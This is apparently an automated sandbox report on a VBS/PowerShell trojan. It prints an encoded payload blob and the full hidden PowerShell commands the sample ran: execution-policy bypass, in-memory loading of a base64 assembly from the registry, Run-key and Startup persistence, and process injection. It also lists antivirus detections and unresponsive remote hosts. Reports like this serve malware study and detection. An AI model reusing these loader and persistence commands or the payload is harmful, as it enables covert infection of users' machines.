AFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAAAHRwBQAEwAAAVMAFAAAA
dVAE4AVgAAHUMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAAB1UATgBJAAABAAMuAAANQwBsAGkAZQBuAHQAABNDAG8AbgBuAGUAYwB@AGUAZAAACVAAbwBsAGwAABNBAHYAYQBpAGwAYQBiAGwAZQAAD1IAZQBjAGUAaQB2AGUAAAtXAHIAaQB@AGUAAA9UAG8AQQByAHIAYQB5AAAPRABpAHMAcABvAHMAZQAADWwAZQBuAGcAdABoAAAVRABpAHMAYwBvAG4AbgBlAGMAdAAAD@MAbwBuAG4AZQBjAHQAAAlTAGUAbgBkAAAXSQBuAGYAbwByAG@AYQB@AGkAbwBuAAAHIAAvACAAAAMgAAA9UwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAEEAbgB@AGkAVgBpAHIAdQBzAFAAcgBvAGQAdQBjAHQAADtTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAARgBpAHIAZQB3AGEAbABsAFAAcgBvAGQAdQBjAHQAAAtGAGEAbABzAGUAAAkyADUAMAAwAAAdUwBlAG4AZABCAHUAZgBmAGUAcgBTAGkAegBlAAANTABlAG4AZwB@AGgAAAk/AD8APwA/AAAXUwB5AHMAdABlAG@ARAByAGkAdgBlAAAHRQBSAFIAAAdZAGUAcwAABU4AbwAAO3MAZQBsAGUAYwB@ACAAKgAgAGYAcgBvAG@AIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAAGUEAZABkAHIAZQBzAHMAVwBpAGQAdABoAAAncgBvAG8AdABcAFMAZQBjAHUAcgBpAHQAeQBDAGUAbgB@AGUAcgAABVgAUAAAAzIAABdkAGkAcwBwAGwAYQB5AE4AYQBtAGUAAAdOAC8AQQAAgINIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAEgAQQBSAEQAVwBBAFIARQBcAEQARQBTAEMAUgBJAFAAVABJAE8ATgBcAFMAWQBTAFQARQBNAFwAQwBFAE4AVABSAEEATABQAFIATwBDAEUAUwBTAE8AUgBcADAAACdQAHIAbwBjAGUAcwBzAG8AcgBOAGEAbQBlAFMAdAByAGkAbgBnAAAAAJYwqmwElwBLiYiNxlAWgnQABCABAQgDIAABBCABAQ4DAAAOBSACARwYBiACARJBCAUgAQESQQkABB@ODg4IEUkRAAgcHBJVDh@cHQ4dElUdAgIHIAMBAg4QAgMAAAEFAAEBEiUFAAEBEmEEAAEBCAIGDgYAAwgODgIEAAEOCAYAAw4ODg4DBhJxBQACHBwcBAABDhwGIAIScQ4CBgADHA4OHAMgAA4EAAEIDgQAAQIOBAABDgIFAAEOHQ4QAAccHBJVDh@cHQ4dElUdAgQAARwcBwABElURgIEGAAIcHBJVCQACARKAhRGAiQUAAR@FDgcAARKAlR@FBgADAQ4OHAUAABKAnQMgABgEAAEKGAYAAwIcHAIGAAMcHBwCBAABAhwEAAEIHAIdBQQgAQIOBiABARKAsQgAAxwcHRwdDgQgAQEcAyAACAoABQEcHRwdDgICEAAIARwSVQ4dHB@OHRJVAgIHAAQODg4ODgUAAg4ODgMgAAsFAAASgMEGAAESgMkOBiAAHRKAzQQgARwIBAABDg4FIAASgN@FIAASgOEFIAASgO@EIAEcDgMgAAIGAAMcAhwcBSACAQ4OBQAAEoD1BSABHQUOBSABDh@FBxUSgPkBHQUHIAMBHQUICAQgAB@FBSABARMABSAAHRMABCABAQoKIAMBEoD9EYEFAgcgAwgdBQgIBQABDh@FCLd6XFYZNOCJCLA/X38R1Qo6BAEAAAAxAQASPGdlbmVyYXRlZCBtZXRob2Q+AQBUDgRUeXBlEjxnZW5lcmF@ZWQgbWV@aG9kPgcgAhIZEh@cBSABARIZAgYCAgYcAwYSNQIGCAMGHQ4DBhIMAwYSOQMGEj
EFIAEBHQUNIAocDg4ODg4OCAIOAgYgAxwODg4DIAAcEQAICBAOEA4IEAgQCBAIEA4IASIDAAAYCAADCBgSgNEICgAFAgYQDggQDggEAAECCgQgAQ4OCCACEoCFHQUOBiABHQUdBQMGEhADBhIIAwYSJQYgAgEcEikDBhEcAwYRGAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEFBwMOAgIZBxAOAhwcElkdDh@OCAgCHQ4dDggIEjUSNQUHAgIQCCsHGB@OAgICAgICEA4QDhAOEA4QDhAOEA4QDhAOEA4QDh@cHQIQDh@cHQIcCgcGHB@cHQICAgIDBwEcJAcYHAgCAgICAgICHQUdHB@CAhKAhRI1AhKAhRwcCAgQDhAOAgoHBgIcHRwdAhwcCQcHDggODggIDgcHBQ4IAg4OCgcEDhKA4RKA5QIMBwYODhKA4RKA5QICBgcCDhKA@QQHAR@FAwcBDhQHBRKAhRUSgPkBHQUSgJkSgJkdDhEHBx@FEoCZEoEBEoCZHQUIAgAAxF@AAAAAAAAAAAAA3l@AAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAANBdAAAAAAAAAAAAAAAAX@NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAABQAAAMAAAA8D@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
regkey_r: microsoft
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\microsoft
success 0 0
One or more non-safelisted processes were created (9 events)
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
parent_process powershell.exe martian_process "C:\Windows\system32\wscript.exe" C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)
Process injection Process 368 resumed a thread in remote process 324
Time & API Arguments Status Return Repeated
1619826881.588503
NtResumeThread
thread_handle: 0x0000026c
suspend_count: 1
process_identifier: 324
success 0 0
Creates a suspicious PowerShell process (16 events)
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
Generates some ICMP traffic
File has been identified by 46 AntiVirus engines on VirusTotal as malicious (46 events)
Elastic malicious (high confidence)
FireEye Trojan.GenericKD.34136992
McAfee Artemis!A6F7C0E5CA9C
Cylance Unsafe
AegisLab Trojan.Script.Generic.4!c
Sangfor Malware
CrowdStrike win/malicious_confidence_60% (W)
BitDefender Trojan.GenericKD.34136992
K7GW Trojan ( 0056a39c1 )
K7AntiVirus Trojan ( 0056a39c1 )
Baidu JS.Trojan-Downloader.Nemucod.yi
Cyren W32/Trojan.DHEM-8615
Symantec Trojan.Gen.MBT
APEX Malicious
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 85)
Kaspersky HEUR:Trojan.Script.Generic
Alibaba Trojan:VBS/Injector.d61e6008
NANO-Antivirus Trojan.Script.ExpKit.fhfkua
MicroWorld-eScan Trojan.GenericKD.34136992
Rising Trojan.Injector!8.C4 (TOPIS:E0:Lj0FFSRMCOC)
Ad-Aware Trojan.GenericKD.34136992
Emsisoft Trojan.GenericKD.34136992 (B)
Comodo Malware@#2ykfo27wo1516
F-Secure Malware.VBS/Injector.yhien
DrWeb Trojan.DownLoader33.60726
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition VBS/Agent.am
Sophos Mal/Generic-S
Ikarus Trojan.VBS.Injector
Webroot W32.Trojan.Gen
Avira VBS/Injector.yhien
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Ymacco.AA70
Arcabit Trojan.Generic.D208E3A0
ZoneAlarm HEUR:Trojan.Script.Generic
GData Trojan.GenericKD.34136992
ALYac Trojan.GenericKD.34136992
MAX malware (ai score=88)
Panda Trj/CI.A
ESET-NOD32 VBS/Injector.AG
Fortinet W32/Script.GENERIC!tr
AVG Other:Malware-gen [Trj]
Cybereason malicious.5ca9c0
Paloalto generic.ml
Qihoo-360 Win32/Trojan.Script.ed4
The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)
dead_host 172.217.160.78:443
dead_host 91.193.75.158:7788
dead_host 193.56.28.101:7788
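Visual Analysis
Binary Image
No binary image available. No binary visualization image was generated for this sample.
Runtime Screenshots
No runtime screenshots available. No screenshots were generated while this sample ran.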


PE Compile Time

2012-06-09 21:19:49

Imports

Library COMCTL32.dll:
Library SHLWAPI.dll:
0x4141c4 SHAutoComplete
Library KERNEL32.dll:
0x414068 DeleteFileW
0x41406c DeleteFileA
0x414070 CreateDirectoryA
0x414074 CreateDirectoryW
0x414078 FindClose
0x41407c FindNextFileA
0x414080 FindFirstFileA
0x414084 FindNextFileW
0x414088 FindFirstFileW
0x41408c GetVersionExW
0x414090 GetFullPathNameA
0x414094 GetFullPathNameW
0x414098 MultiByteToWideChar
0x41409c GetModuleFileNameW
0x4140a0 FindResourceW
0x4140a4 GetModuleHandleW
0x4140a8 HeapAlloc
0x4140ac GetProcessHeap
0x4140b0 HeapFree
0x4140b4 HeapReAlloc
0x4140b8 CompareStringA
0x4140bc ExitProcess
0x4140c0 GetTickCount
0x4140c4 FreeLibrary
0x4140c8 GetProcAddress
0x4140cc LoadLibraryW
0x4140d0 GetCurrentProcessId
0x4140d4 SetFileAttributesW
0x4140d8 GetNumberFormatW
0x4140e0 GetDateFormatW
0x4140e4 GetTimeFormatW
0x4140f4 WaitForSingleObject
0x4140f8 Sleep
0x4140fc GetExitCodeProcess
0x414100 GetTempPathW
0x414104 MoveFileExW
0x414108 UnmapViewOfFile
0x41410c MapViewOfFile
0x414110 GetCommandLineW
0x414114 CreateFileMappingW
0x41411c OpenFileMappingW
0x414128 GetSystemTime
0x41412c WideCharToMultiByte
0x414130 CompareStringW
0x414134 IsDBCSLeadByte
0x414138 GetCPInfo
0x41413c GlobalAlloc
0x414144 SetFileAttributesA
0x414148 GetFileAttributesW
0x41414c GetFileAttributesA
0x414150 WriteFile
0x414154 GetStdHandle
0x414158 ReadFile
0x414160 CreateFileW
0x414164 CreateFileA
0x414168 GetFileType
0x41416c SetEndOfFile
0x414170 SetFilePointer
0x414174 FlushFileBuffers
0x414178 MoveFileW
0x41417c SetFileTime
0x414180 GetCurrentProcess
0x414184 CloseHandle
0x414188 SetLastError
0x41418c GetLastError
0x414190 GetLocaleInfoW
Library USER32.dll:
0x4141cc GetClassNameW
0x4141d0 DialogBoxParamW
0x4141d4 IsWindowVisible
0x4141d8 WaitForInputIdle
0x4141dc SetForegroundWindow
0x4141e0 GetSysColor
0x4141e4 PostMessageW
0x4141e8 LoadBitmapW
0x4141ec LoadIconW
0x4141f0 CharToOemA
0x4141f4 OemToCharA
0x4141f8 IsWindow
0x4141fc CopyRect
0x414200 DestroyWindow
0x414204 DefWindowProcW
0x414208 RegisterClassExW
0x41420c LoadCursorW
0x414210 UpdateWindow
0x414214 CreateWindowExW
0x414218 MapWindowPoints
0x41421c GetParent
0x414220 GetDlgItemTextW
0x414224 TranslateMessage
0x414228 DispatchMessageW
0x41422c wvsprintfW
0x414230 wvsprintfA
0x414234 CharUpperA
0x414238 CharToOemBuffA
0x41423c LoadStringW
0x414240 GetWindowRect
0x414244 GetClientRect
0x414248 SetWindowPos
0x41424c GetWindowTextW
0x414250 SetWindowTextW
0x414254 GetSystemMetrics
0x414258 GetWindow
0x41425c GetWindowLongW
0x414260 CharUpperW
0x414264 CharToOemBuffW
0x414268 MessageBoxW
0x41426c ShowWindow
0x414270 GetDlgItem
0x414274 EnableWindow
0x414278 OemToCharBuffA
0x41427c SendDlgItemMessageW
0x414280 DestroyIcon
0x414284 EndDialog
0x414288 SetFocus
0x41428c SetDlgItemTextW
0x414290 SendMessageW
0x414294 GetDC
0x414298 ReleaseDC
0x41429c PeekMessageW
0x4142a0 FindWindowExW
0x4142a4 GetMessageW
0x4142a8 SetWindowLongW
Library GDI32.dll:
0x414044 GetDeviceCaps
0x414048 GetObjectW
0x414050 SelectObject
0x414054 StretchBlt
0x414058 CreateCompatibleDC
0x41405c DeleteObject
0x414060 DeleteDC
Library COMDLG32.dll:
0x414034 GetOpenFileNameW
0x41403c GetSaveFileNameW
Library ADVAPI32.dll:
0x414000 RegOpenKeyExW
0x414008 RegQueryValueExW
0x41400c RegCreateKeyExW
0x414010 RegSetValueExW
0x414014 RegCloseKey
0x414018 SetFileSecurityW
0x41401c SetFileSecurityA
0x414020 OpenProcessToken
Library SHELL32.dll:
0x4141a0 SHChangeNotify
0x4141a4 ShellExecuteExW
0x4141a8 SHFileOperationW
0x4141ac SHGetFileInfoW
0x4141b4 SHGetMalloc
0x4141b8 SHBrowseForFolderW
Library ole32.dll:
0x4142b0 CLSIDFromString
0x4142b8 OleUninitialize
0x4142bc CoCreateInstance
0x4142c0 OleInitialize
Library OLEAUT32.dll:
0x414198 VariantInit

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49208 113.108.239.130 r1---sn-j5o76n7e.gvt1.com 80
192.168.56.101 49207 203.208.41.65 redirector.gvt1.com 80
192.168.56.101 49205 203.208.41.66 update.googleapis.com 443
192.168.56.101 49209 58.63.233.69 r4---sn-j5o76n7l.gvt1.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 62912 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://r1---sn-j5o76n7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619803697&mv=m&mvi=1&pl=23&shardbypass=yes
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619803697&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o76n7e.gvt1.com

http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com

http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=74ddce77771dfc27&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619803937&mv=m
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=74ddce77771dfc27&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619803937&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r4---sn-j5o76n7l.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.